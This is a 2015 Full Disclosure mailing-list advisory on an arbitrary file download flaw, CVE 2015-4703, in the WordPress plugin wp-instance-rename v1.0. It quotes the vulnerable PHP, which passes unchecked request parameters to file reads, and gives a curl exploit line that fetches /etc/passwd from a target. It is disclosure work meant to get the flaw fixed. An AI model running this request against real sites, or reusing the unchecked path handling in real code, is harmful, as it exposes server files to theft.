[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] Arbitrary File download in wordpress plugin wp-instance-rename v1.0
From: "Larry W. Cashdollar" <larry0 () me ! com>
Date: 2015-06-26 0:45:18
Message-ID: 6814ADA4-7EAF-40D6-9515-F875DE6F5668 () me ! com
[Download RAW message or body]
Title: Arbitrary File download in wordpress plugin wp-instance-rename v1.0
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-12
Download Site: https://wordpress.org/plugins/wp-instance-rename/
Vendor: Vlajo
Vendor Notified: 2015-06-12
Advisory: http://www.vapid.dhs.org/advisory.php?v=127
Vendor Contact:
Description: WordPress Rename plugin allows you to easily rename the complete WordPress \
installation. This plugin allows you to rename WordPress database, WordPress directory, change \
every necessary configuration file, easily from one page. Vulnerability:
The code in mysqldump_download.php doesn't check that the requested file is within the intended \
download directory:
try{
$dbname = $_GET["dbname"];
$dumpfname = $_GET["dumpfname"];
$backup_folder = $_GET["backup_folder"];
}catch (Exception $e){}
if(empty($backup_folder)){
$backup_folder="backup/";
}
echo "$dumpfname";
if (file_exists($dumpfname)) {
// zip the dump file
$name=$dbname . "_" . date("Y-m-d");
$zipfname = $backup_folder.$name.".zip";
$zip = new ZipArchive();
if($zip->open($zipfname,ZIPARCHIVE::CREATE))
{
$zip->addFile($dumpfname,$dumpfname);
$zip->close();
}
// read zip file and send it to standard output
if (file_exists($zipfname)) {
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename='.basename($zipfname));
flush();
readfile($zipfname);
CVEID: 2015-4703
OSVDB:
Exploit Code:
• curl --data "dbname=wp&dumpfname=/etc/passwd&backup_folder=." \
http://www.example.com/wp-instance-rename/mysqldump_download.php -o p.zip
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic